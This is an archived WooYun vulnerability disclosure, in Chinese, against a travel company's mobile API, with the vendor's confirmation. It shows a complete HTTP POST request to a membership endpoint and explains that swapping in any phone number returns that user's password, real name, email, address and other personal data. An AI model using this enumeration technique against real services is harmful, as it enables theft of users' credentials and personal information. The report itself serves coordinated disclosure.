漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-10: 厂商已经确认,细节仅向厂商公开
2014-01-13: 细节向第三方安全合作伙伴开放
2014-01-20: 细节向核心白帽子及相关领域专家公开
2014-01-30: 细节向普通白帽子公开
2014-02-19: 细节向实习白帽子公开
2014-04-10: 细节向公众公开

简要描述:

应该算是通用漏洞吧

详细说明:

APP登陆账号后 有个POST包

POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1
Accept-Encoding: gzip
Content-Type: application/json;charset=utf-8
Content-Length: 428
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D)
Host: tcmobileapi.17usoft.com
Connection: Keep-Alive

{"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}



QQ图片20140110125040.jpg

修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........

漏洞证明:

APP登陆账号后 有个POST包

POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1
Accept-Encoding: gzip
Content-Type: application/json;charset=utf-8
Content-Length: 428
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D)
Host: tcmobileapi.17usoft.com
Connection: Keep-Alive

{"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}



QQ图片20140110125040.jpg

修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........

修复方案:

不知道

版权声明:转载请注明来源 蜉蝣@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-01-10 17:25

厂商回复:

感谢 @蜉蝣 正在修复中!

最新状态:

暂无


漏洞评价: